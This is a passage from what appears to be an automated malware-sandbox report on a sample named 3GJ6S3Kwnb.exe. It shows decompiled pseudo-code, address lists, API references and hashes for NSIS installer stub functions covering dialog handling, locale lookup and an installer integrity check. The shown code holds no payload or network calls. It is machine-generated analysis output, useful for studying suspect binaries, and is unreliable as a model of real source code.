									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x4291f8, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ac - _t136;
											if( *0x42a2ac == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421ed8 = 1;
												L23:
												_push(0x78);
												L24:
												E0040443C();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421ed8 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0x1
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x4291f8);
						 *0x4291f8 = _t122;
						L60:
						if( *0x425708 == _t136 &&  *0x4291f8 != _t136) {
							ShowWindow(_t127, 0xa); // executed
							 *0x425708 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x4236e8,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E004044CA(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}

0x00403f6f
0x00403f76
0x004040dd
0x004040e1
0x004040e5
0x004040e7
0x004040ec
0x004040f7
0x00404102
0x00404107
0x00404109
0x0040410b
0x0040410e
0x00404113
0x00404121
0x0040412e
0x00404135
0x00404135
0x00404136
0x00404136
0x0040413b
0x00404141
0x00404148
0x0040414e
0x00404150
0x00404190
0x00404195
0x0040419a
0x0040419a
0x0040419f
0x004041a8
0x004041aa
0x004041af
0x004041b5
0x004041b9
0x004041b9
0x004041be
0x004041c4
0x00000000
0x00000000
0x004041cf
0x004041d5
0x00000000
0x00000000
0x004041de
0x004041e6
0x004041eb
0x004041ee
0x004041f4
0x004041f9
0x004041fc
0x00404202
0x00404207
0x0040420a
0x00404210
0x00404218
0x0040421e
0x00404224
0x00404228
0x0040422f
0x0040422f
0x0040422f
0x00404239
0x0040424b
0x00404257
0x0040425c
0x00404266
0x0040426c
0x0040426e
0x00404273
0x00404270
0x00404270
0x00404270
0x00404283
0x0040429b
0x0040429d
0x004042a3
0x004042b8
0x004042a5
0x004042ae
0x004042b0
0x004042b0
0x004042be
0x004042cf
0x004042e5
0x004042ec
0x004042f6
0x004042fb
0x004042fd
0x00000000
0x00404303
0x00404303
0x00404305
0x00000000
0x00000000
0x0040430b
0x0040430f
0x00404334
0x0040433a
0x00404340
0x00404342
0x00000000
0x00000000
0x00404368
0x0040436e
0x00404370
0x00404375
0x00000000
0x00000000
0x0040437b
0x0040437e
0x00404381
0x00404398
0x004043a4
0x004043bd
0x004043c7
0x004043cc
0x004043d2
0x00000000
0x00000000
0x004043dc
0x004043e7
0x00000000
0x004043e7
0x00404311
0x00404317
0x00000000
0x00000000
0x0040431d
0x00404323
0x00000000
0x00000000
0x00000000
0x00404329
0x004042fd
0x004043f4
0x00404400
0x00404407
0x00000000
0x00404152
0x00404152
0x00404155
0x00404188
0x00404188
0x0040418a
0x00000000
0x00000000
0x00000000
0x0040418a
0x0040415b
0x00404160
0x00404162
0x00000000
0x00000000
0x00404172
0x0040417a
0x00000000
0x00404180
0x00403f88
0x00403f88
0x00403f8c
0x00403f91
0x00403fa0
0x00403fa0
0x00403fa6
0x00403fad
0x00403ff1
0x00403ff7
0x00404010
0x00404013
0x00404026
0x0040402c
0x00000000
0x00000000
0x00404032
0x0040403d
0x0040403f
0x00404041
0x00404060
0x00404060
0x00404063
0x00404068
0x0040406b
0x0040407b
0x0040407c
0x0040407e
0x004040b4
0x004040c4
0x00000000
0x004040c4
0x00404080
0x00404086
0x0040409f
0x004040a4
0x004040a6
0x00000000
0x00000000
0x004040a8
0x00404094
0x00404094
0x00404096
0x00404096
0x00000000
0x00404096
0x00404089
0x0040408e
0x00000000
0x0040408e
0x0040406d
0x00404073
0x00000000
0x00000000
0x00404075
0x00000000
0x00404075
0x00404065
0x00000000
0x00404065
0x0040404b
0x00404052
0x00404058
0x0040405a
0x00404430
0x00000000
0x00404430
0x00000000
0x0040405a
0x00404018
0x00000000
0x00404020
0x00403fff
0x00404005
0x0040440d
0x00404413
0x00404420
0x00404426
0x00404426
0x00000000
0x00403faf
0x00403fb4
0x00403fc0
0x00403fc9
0x004040ca
0x00000000
0x00403fe8
0x00403feb
0x00000000
0x00403feb
0x00403fc9
0x00403fad

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FA0
ShowWindow.USER32(?), ref: 00403FC0
GetWindowLongW.USER32(?,000000F0), ref: 00403FD2
ShowWindow.USER32(?,00000004), ref: 00403FEB
DestroyWindow.USER32 ref: 00403FFF
SetWindowLongW.USER32(?,00000000,00000000), ref: 00404018
GetDlgItem.USER32 ref: 00404037
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040404B
IsWindowEnabled.USER32(00000000), ref: 00404052
GetDlgItem.USER32 ref: 004040FD
GetDlgItem.USER32 ref: 00404107
KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404121
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404172
GetDlgItem.USER32 ref: 00404218
ShowWindow.USER32(00000000,?), ref: 00404239
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040424B
EnableWindow.USER32(?,?), ref: 00404266
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040427C
EnableMenuItem.USER32 ref: 00404283
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040429B
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042AE
lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004042D8
SetWindowTextW.USER32(?,00423708), ref: 004042EC
ShowWindow.USER32(?,0000000A), ref: 00404420

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuUser$DestroyEnabledSystemTextlstrlen
String ID:
API String ID: 3618520773-0
Opcode ID: 0f645c2587df08bd01e23aba799d426afd4c2e1534118d29ef39e58b546f5509
Instruction ID: 63d0405a778065079f0a8243b170f3468528db945c37da0c1c9e117f306831cd
Opcode Fuzzy Hash: 0f645c2587df08bd01e23aba799d426afd4c2e1534118d29ef39e58b546f5509
Instruction Fuzzy Hash: 30C1D2B1600205EBDB306F61ED89E3A3A68EB94709F51053EF791B11F0CB795852DB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403BB6 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403BB6(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a230;
				_t22 = E004068D4(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423708;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E004063D5(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423708, 0);
					__eflags =  *0x423708;
					if(__eflags == 0) {
						E004063D5(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423708, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E0040644E(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403E8C(_t78, _t90);
				_t86 = L"C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x42a2a0 =  *0x42a238 & 0x00000020;
				 *0x42a2bc = 0x10000;
				if(E00405EDE(_t90, L"C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405EDE(_t98, _t86) == 0) {
						E00406544(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a220, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429208 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403E8C(_t78, __eflags);
							__eflags =  *0x42a2c0;
							if( *0x42a2c0 != 0) {
								_t33 = E0040563C(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x4291ec;
								if( *0x4291ec == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x4236e8, 5); // executed
							_t39 = E00406864("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E00406864("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x4291c0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x4291c0);
								 *0x4291e4 = _t87;
								RegisterClassW(0x4291c0);
							}
							_t44 = DialogBoxParamW( *0x42a220,  *0x429200 + 0x00000069 & 0x0000ffff, 0, E00403F64, 0); // executed
							E00403B06(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a220;
						 *0x4291c4 = E00401000;
						 *0x4291d0 =  *0x42a220;
						 *0x4291d4 = _t30;
						 *0x4291e4 = 0x40a380;
						if(RegisterClassW(0x4291c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x4236e8 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a220, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x4281c0;
					E004063D5(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a258 + _t78 * 2,  *0x42a258 +  *(_t82 + 0x4c) * 2, 0x4281c0, 0);
					_t63 =  *0x4281c0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x4281c2;
						 *((short*)(E00405E03(0x4281c2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406507(_t86, E00405DD6(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E22(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403bbc
0x00403bc5
0x00403bcc
0x00403bce
0x00403be2
0x00403bf4
0x00403bfd
0x00403c06
0x00403c0d
0x00403c12
0x00403c19
0x00403c2c
0x00403c2c
0x00403c37
0x00403bd0
0x00403bdb
0x00403bdb
0x00403c3c
0x00403c46
0x00403c4f
0x00403c54
0x00403c65
0x00403cf7
0x00403cff
0x00403d08
0x00403d08
0x00403d1e
0x00403d24
0x00403d32
0x00403db3
0x00403dbb
0x00403dc5
0x00403dca
0x00403dd0
0x00403e5a
0x00403e5f
0x00403e61
0x00403e7d
0x00000000
0x00403e7d
0x00403e63
0x00403e69
0x00403e71
0x00403e71
0x00000000
0x00403e69
0x00403dde
0x00403de9
0x00403dee
0x00403df0
0x00403df7
0x00403df7
0x00403e02
0x00403e0a
0x00403e0c
0x00403e0e
0x00403e17
0x00403e1a
0x00403e20
0x00403e20
0x00403e3f
0x00403e50
0x00000000
0x00403e55
0x00403dbd
0x00403dbf
0x00000000
0x00403d34
0x00403d34
0x00403d40
0x00403d4a
0x00403d50
0x00403d55
0x00403d64
0x00403e82
0x00403e82
0x00000000
0x00403e82
0x00403d73
0x00403dae
0x00000000
0x00403dae
0x00403c6b
0x00403c6b
0x00403c6e
0x00403c70
0x00000000
0x00000000
0x00403c7e
0x00403c90
0x00403c95
0x00403c9e
0x00000000
0x00000000
0x00403ca4
0x00403ca6
0x00403cb3
0x00403cb3
0x00403cbc
0x00403cc2
0x00403cea
0x00403cf2
0x00000000
0x00403cd4
0x00403cd5
0x00403cde
0x00403ce4
0x00403ce5
0x00000000
0x00403ce5
0x00403ce0
0x00403ce2
0x00000000
0x00000000
0x00000000
0x00403ce2
0x00403cc2

APIs

Part of subcall function 004068D4: GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
Part of subcall function 004068D4: GetProcAddress.KERNEL32(00000000,?), ref: 00406901

lstrcatW.KERNEL32(1033,00423708), ref: 00403C37
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,76CDFAA0), ref: 00403CB7
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403CCA
GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403CD5
LoadImageW.USER32 ref: 00403D1E

Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B

RegisterClassW.USER32 ref: 00403D5B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D73
CreateWindowExW.USER32 ref: 00403DA8
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DDE
GetClassInfoW.USER32 ref: 00403E0A
GetClassInfoW.USER32 ref: 00403E17
RegisterClassW.USER32 ref: 00403E20
DialogBoxParamW.USER32 ref: 00403E3F

Strings

_Nb, xrefs: 00403D3A, 00403DA2
Control Panel\Desktop\ResourceLocale, xrefs: 00403BEA
RichEd20, xrefs: 00403DE4
.exe, xrefs: 00403CC4
C:\Users\user\AppData\Local\Temp, xrefs: 00403C46, 00403C4E, 00403CF1, 00403CF7, 00403D07
.DEFAULT\Control Panel\International, xrefs: 00403C22
RichEd32, xrefs: 00403DF2
Call, xrefs: 00403C7E, 00403C87, 00403C95, 00403CE4, 00403CEA
RichEdit20W, xrefs: 00403E02, 00403E08
C:\Users\user\AppData\Local\Temp\, xrefs: 00403BBB
1033, xrefs: 00403BD6, 00403C32
RichEdit, xrefs: 00403E11

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-2935473529
Opcode ID: 73edebf74719983ef77143eb6301a5e89110d11547243c9355ecf98ec76e07f3
Instruction ID: f8e28dda484975e23f2397f6e39507faffe4a9094113ace64084d81fe028ea3a
Opcode Fuzzy Hash: 73edebf74719983ef77143eb6301a5e89110d11547243c9355ecf98ec76e07f3
Instruction Fuzzy Hash: B761D570244200BBD720AF66AD45F2B3A6CEB84B49F40453FFD41B62E1DB795912CA7D

Uniqueness

Uniqueness Score: -1.00%

Function 0040307D Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\jones\\Desktop\\3GJ6S3Kwnb.exe";
				 *0x42a22c = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\jones\\Desktop\\3GJ6S3Kwnb.exe", 0x400);
				_t89 = E00405FF7(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406507(0x436800, _t91);
				E00406507(0x439000, E00405E22(0x436800));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x420ec4 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019(1);
					__eflags =  *0x42a234 - _t82;
					if( *0x42a234 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x403847
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034AF( *0x42a234 + 0x1c);
						_t35 =  &_v24; // 0x403847
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004032B4(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42a230 = _t94;
							 *0x42a238 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42a23c =  *0x42a23c + 1;
								__eflags =  *0x42a23c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FB2(0x42a240, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004034AF( *0x414eb8);
					_t65 = E00403499( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42a234) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403499(0x40ceb8, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00403019(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42a234;
						if( *0x42a234 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FB2( &_v44, 0x40ceb8, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x414eb8; // 0x67da0
						 *0x42a2c0 =  *0x42a2c0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42a234 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x420ec4; // 0x67da4
						if(__eflags < 0) {
							_v12 = E004069C1(_v12, 0x40ceb8, _t90);
						}
						 *0x414eb8 =  *0x414eb8 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 != 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00403085
0x00403088
0x0040308b
0x0040308e
0x00403094
0x004030a5
0x004030aa
0x004030bd
0x004030c2
0x004030c5
0x004030cb
0x00000000
0x004030cd
0x004030de
0x004030ef
0x004030f6
0x004030fc
0x004030fe
0x00403103
0x00403105
0x004031f0
0x004031f2
0x004031f7
0x004031fe
0x00000000
0x00000000
0x00403200
0x00403203
0x00403227
0x00403227
0x0040322c
0x00403232
0x0040323d
0x00403242
0x00403242
0x00403245
0x00403246
0x00403247
0x00403249
0x0040324e
0x00403251
0x00403264
0x00403268
0x00403270
0x00403275
0x00403277
0x00403277
0x00403277
0x0040327f
0x0040327f
0x00403282
0x00403283
0x00403283
0x00403286
0x00403288
0x00403288
0x00403288
0x00403292
0x00403298
0x004032a6
0x004032ab
0x00000000
0x004032ab
0x00000000
0x00403251
0x0040320b
0x00403216
0x0040321b
0x0040321d
0x00000000
0x00000000
0x00403222
0x00403225
0x00000000
0x00000000
0x00000000
0x0040310b
0x00403110
0x00403115
0x00403119
0x00403120
0x00403125
0x00403127
0x00403129
0x00403129
0x0040312d
0x00403132
0x00403134
0x0040325c
0x00403253
0x00000000
0x00403253
0x0040313a
0x00403141
0x004031bd
0x004031c1
0x004031c5
0x004031ca
0x00000000
0x004031c1
0x0040314a
0x0040314f
0x00403152
0x00403157
0x00000000
0x00000000
0x00403159
0x00403160
0x00000000
0x00000000
0x00403162
0x00403169
0x00000000
0x00000000
0x0040316b
0x00403172
0x00000000
0x00000000
0x00403174
0x0040317b
0x00000000
0x00000000
0x0040317d
0x00403183
0x0040318c
0x00403192
0x00403195
0x00403197
0x0040319d
0x00000000
0x00000000
0x004031a3
0x004031a7
0x004031af
0x004031af
0x004031b2
0x004031b5
0x004031b7
0x004031b9
0x004031b9
0x00000000
0x004031b7
0x004031a9
0x004031ad
0x00000000
0x00000000
0x00000000
0x004031cb
0x004031cb
0x004031d1
0x004031dd
0x004031dd
0x004031e0
0x004031e6
0x004031e6
0x004031e6
0x004031ee
0x004031ee
0x00000000
0x004031ee

APIs

GetTickCount.KERNEL32 ref: 0040308E
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\3GJ6S3Kwnb.exe,00000400,?,?,?,?,?,00403847,?), ref: 004030AA

Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\3GJ6S3Kwnb.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\3GJ6S3Kwnb.exe,C:\Users\user\Desktop\3GJ6S3Kwnb.exe,80000000,00000003,?,?,?,?,?,00403847), ref: 004030F6
GlobalAlloc.KERNELBASE(00000040,G8@,?,?,?,?,?,00403847,?), ref: 0040322C

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
soft, xrefs: 0040316B
G8@, xrefs: 00403227, 00403242
C:\Users\user\Desktop\3GJ6S3Kwnb.exe, xrefs: 00403094, 004030A3, 004030B7, 004030D7
C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
Null, xrefs: 00403174
Inst, xrefs: 00403162
Error launching installer, xrefs: 004030CD

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\3GJ6S3Kwnb.exe$Error launching installer$G8@$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-59120882
Opcode ID: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
Instruction ID: 1a01736021049f1647ec9a5272654600d533d4cd09788acd7f842f4bfc25432a
Opcode Fuzzy Hash: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
Instruction Fuzzy Hash: 06518371901205AFDB209F65DD82B9E7EACEB09756F10807BF901B62D1C77C8F418A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E4D( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405DD6(E00406507(_t81, 0x436000)), ??);
				} else {
					E00406507();
				}
				E0040678E(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040683D(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
